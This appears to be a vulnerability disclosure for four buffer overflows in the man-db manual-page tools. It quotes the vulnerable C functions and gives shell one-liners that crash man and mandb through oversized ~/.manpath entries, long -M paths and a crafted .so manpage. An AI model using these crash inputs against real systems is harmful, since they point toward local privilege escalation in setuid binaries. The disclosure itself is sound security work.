|
[part 1: add_to_dirlist() buffer overflow] man-db contains a buffer overflow vulnerability do to the lack of bounds checking in multiple sscanf() calls. which formats the user supplied file ~/.manpath. here is the function(src/manp.c): static void add_to_dirlist (FILE *config, int user) { char *bp; char buf[BUFSIZ]; char key[50], cont[512]; int c; while ((bp = fgets (buf, BUFSIZ, config))) { while (isspace (*bp)) bp++; if (*bp == '#' || *bp == '\0') continue; else if (strncmp (bp, "NO", 2) == 0) continue; else if (sscanf (bp, "MANBIN %*s") == 1) continue; else if (sscanf (bp, "MANDATORY_MANPATH %s", key) == 1) add_mandatory (key); else if (sscanf (bp, "MANPATH_MAP %s %s", key, cont) == 2) add_manpath_map (key, cont); else if ((c = sscanf (bp, "MANDB_MAP %s %s", key, cont)) > 0) add_mandb_map (key, cont, c, user); else if ((c = sscanf (bp, "DEFINE %50s %511[^\n]", key, cont)) > 0) add_def (key, cont, c); else if (sscanf (bp, "SECTION %511[^\n]", cont) == 1) add_sections (cont); else if (sscanf (bp, "SECTIONS %511[^\n]", cont) == 1) /* Since I keep getting it wrong ... */ add_sections (cont); else { error (0, 0, _("can't parse directory list `%s'"), bp); gripe_reading_mp_config (CONFIG_FILE); } } } as you can see; MANDATORY_MANPATH, MANPATH_MAP, and MANDB_MAP do not properly limit the value written to key[50], and/or cont[512]). however, as far as exploitation by overflowing those buffers goes is limited. this is do to the way the buffers are allocated in memory, so when overwritten, will just overwrite into another character buffer. but, this is not all in vain. do to the size of buf[BUFSIZE], which is 8192 bytes(standard), and what key/cont overwrites into. you can pass enormously long values(~8192) to other functions. as most checks are done before-hand, and almost all buffers in the program are allocated to 4095 bytes; you can make the overflow occur, in many locations, elsewhere in the program. proof/to test for vulnerability existence: (mandb will not make "x" when setuid, make it for it/bypass) # cd /tmp # mkdir x # echo MANDB_MAP `perl -e 'print"x"x8100'` x >~/.manpath # mandb Segmentation fault (can also apply this to the "man" binary, by fooling it with links) # cd /tmp # mkdir x # ln /usr/bin/man mandb # echo MANDB_MAP `perl -e 'print"x"x8100'` x >~/.manpath # ./mandb Segmentation fault versions found to have the vulnerability(current): 2.4.1, 2.4.0, 2.3.20, 2.3.19, 2.3.18, ...?(far as i went back) [part 2: ult_src() buffer overflow] man-db contains a buffer overflow vulnerability do to the size of a buffer being half the size it should be(doesn't follow the 4096 trend), for a "path". another quote from the source(src/ult_src.c): char *ult_src (char *name, const char *path, struct stat *buf, int flags) { static char basename[2048]; /* must be static */ static short recurse; /* must be static */ static char *relative; /* must be static */ /* initialise the function */ /* as ult_softlink() & ult_hardlink() do all of their respective * resolving in one call, only need to sort them out once */ if (recurse == 0) { struct stat new_buf; (void) strcpy (basename, name); ...(other possibilities continue) } proof/to test for vulnerability existence: # man -M `perl -e 'print"/"x2100'`usr/share/man ls ...(verbose) Segmentation fault versions found to have the vulnerability(current): 2.4.1, 2.4.0, 2.3.20, 2.3.19, 2.3.18, ...?(far as i went back) [part 3: ".so" link buffer overflow] man-db contains a buffer overflow vulnerability do to the lack of bounds checking for ".so" link/redirection manpages. this occurs when the function attempts to change memory, without re-calculating the size. another source reference(src/ult_src.c): static __inline__ int test_for_include (char *buffer, char *rel) { /* strip out any leading whitespace (if any) */ while (isspace ((int) *buffer)) buffer++; /* see if the `command' is a .so */ if (strncmp (buffer, ".so", 3) == 0) { buffer += 3; /* strip out any whitespace between the command and it's argumant */ while (isspace ((int) *buffer)) buffer++; if (*buffer != '/') { /* copy filename into rel address */ while (*buffer && !isspace ((int) *buffer)) *(rel++) = *(buffer++); *rel = '\0'; return 1; } } return 0; } proof/to test for vulnerability existence: # cd /tmp # mkdir man man/man1 # echo .so `perl -e 'print"x"x1024'` >man/man1/x.1 # man -M /tmp/man x ...(verbose) Segmentation fault versions found to have the vulnerability(current): 2.4.1, 2.4.0, ...?(far as i went back) [part 4: PATH/MANPATH argument overflow] man-db contains a buffer overflow vulnerability do to the lack of bounds checking for the amount PATH/MANPATH values given. the bug is found in multiple routines. proof/to test for vulnerability existence: # man -M `perl -e 'print"/tmp:"x260'` x Segmentation fault versions found to have the vulnerability(current): 2.4.1, 2.4.0, 2.3.20, 2.3.19, 2.3.18, ...?(far as i went back) Vade79 -> v9@fakehalo.deadpig.org -> fakehalo.